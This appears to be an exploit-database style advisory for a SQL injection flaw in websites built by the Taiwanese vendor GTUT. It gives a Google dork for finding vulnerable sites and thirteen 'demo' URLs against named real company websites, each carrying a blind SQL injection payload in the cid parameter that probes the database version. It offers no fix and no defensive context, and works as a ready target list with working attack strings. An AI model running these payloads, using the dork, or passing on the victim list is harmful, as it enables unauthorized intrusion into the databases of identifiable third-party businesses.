######################
# Exploit Title : Design by GTUT SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.gtut.com.tw/
# Google Dork : intext:"Design by GTUT" msg.php
# Date: 28 01 2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
#
# demos :
# http://www.flweb.com.tw/exec/msg.php?mid=1&cid=3 and(version() regexp CHAR/**/(94, 53))&mod=show&pid=13&lg=T
# http://www.kmfsports.com/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.dacosemi.com.tw/exec/msg.php?mid=4&cid=4%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.ckoptics.com/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg&lg=E
# http://www.rato.tw/exec/msg.php?mid=6&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&pid=6&lg=E
# http://www.stingray.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.nuzon.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.cyelectronic.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.tongson.com.tw/exec/msg.php?mid=3&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.lampweb.com.tw/exec/msg.php?mid=3&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.songjin.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=T
# http://www.chiemei.com/exec/msg.php?lg=E&mid=14&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))
# http://www.ygget.com/exec/msg.php?off=1&mid=36&cid=18%20and(version()%20regexp%20CHAR/**/(94,%2053))&pid=18&lg=S
######################
# discovered by : modiret
######################